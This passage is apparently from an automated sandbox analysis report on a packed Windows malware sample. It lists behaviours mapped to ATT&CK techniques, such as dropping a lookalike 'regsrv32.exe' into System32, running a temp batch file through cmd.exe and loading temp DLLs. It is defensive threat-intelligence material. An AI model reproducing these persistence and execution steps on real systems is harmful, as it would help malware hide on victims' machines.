\"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a790000\n \"regsrv32.exe\" loaded module \"KERNEL32.DLL\" at base 76260000\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 75b90000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\r2473.bat (UID: 00000000-00005940)\n \"regsrv32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006004)\n \"regsrv32.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006004)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004236)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"regsrv32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"regsrv32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776D0000\n \"regsrv32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776D0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an executable section named \"UPX0\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an executable section named \"UPX1\"\n \"regsrv32.exe\" has an executable section named \"UPX0\"\n \"regsrv32.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an writable section named \"UPX0\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an writable section named \"UPX1\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an writable section named \"UPX2\"\n \"regsrv32.exe\" has an writable section named \"UPX0\"\n \"regsrv32.exe\" has an writable section named \"UPX1\"\n \"regsrv32.exe\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"regsrv32.exe\" (UID: 00000000-00006004)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2473.bat\" \"\" (UID: 00000000-00004236)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"regsrv32.exe\" (UID: 00000000-00006004)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2473.bat\" \"\" (UID: 00000000-00004236)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2473.bat\" \"\" (UID: 00000000-00004236)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"regsrv32.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"regsrv32.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" was detected as \"Microsoft visual C++ 5.0\"\n \"regsrv32.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\regsrv32.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\REGSRV32.EXE\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\SECUR32.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"regsrv32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\windows\\system32\\regsrv32.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\AEBOT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\version.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\regsrv32.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Secur32.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\Secur32.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\SSPICLI.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\SSPICLI.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to touch file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe.Local\\\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\F489E33D812F81D343BA0FC6837DB386D06F3D7AFD3B42C6136DA690E466548C.EXE.LOCAL\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2473.bat:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2473.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2473.BAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" writes file \"c:\\windows\\system32\\regsrv32.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"C:\\Windows\\system32\\regsrv32.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"C:\\Windows\\System32\\regsrv32.exe\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"regsrv32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\regsrv32.exe]- [targetUID: 00000000-00005940]\n \"r2473.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2473.bat]- [targetUID: 00000000-00005940]\n \"REGSRV32.EXE.67A9C472.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n 